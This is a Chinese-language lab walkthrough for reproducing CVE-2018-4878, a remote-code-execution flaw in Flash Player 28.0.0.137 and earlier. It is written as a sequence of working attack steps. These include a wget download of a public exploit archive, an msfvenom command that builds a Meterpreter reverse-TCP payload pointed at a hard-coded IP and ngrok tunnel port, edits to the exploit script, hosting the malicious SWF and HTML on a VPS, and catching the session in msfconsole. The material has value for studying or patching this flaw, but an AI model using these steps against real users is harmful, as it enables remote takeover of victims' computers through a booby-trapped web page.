CVE-2018-4878利用flash的漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。
Flash Player28.0.0.137及以前的所有版本
2.1 测试环境
攻击机:kali2017
靶机:win7_x64+IE8+FLASH_player28.0.0.137
2.2 复现过程
1.在github上面下载cve-2018-4878的exp并解压
wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar
2.用ngrok配置内网穿透
这里的作用是将tcp://0.tcp.ngrok.io:10270的流量转发到本地的1234端口
我们再ping一下得到ip
3.用msfvenom生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=52.14.61.47 lport=10270 -f python>/var/shellcode.txt
4.修改exp
复制我们生成的shellcode
用vim打开我们的cve-2018-4878.py,然后用我们刚才生成的shellcode替换开头的shellcode
然后将stageless的值改为false
修改文件路径为我们的解压路径
然后将解压路径下的exp测试弹出文件夹下的index.html和exploit.swf复制到解压路径
然后运行python cve-2018-4878.py
5.msf配置监听
运行msfconsole
然后设置paylaod,监听地址,监听端口
等待肉鸡上线
6.复制文件到vps上面,用靶机访问,完成复现
我们可以通过winscp将我们生成的exploit.swf和index.html复制到vps的html目录下
然后用靶机访问页面
然后会返回一个session
然后可以通过sessions -i命令进入meterpreter
复现成功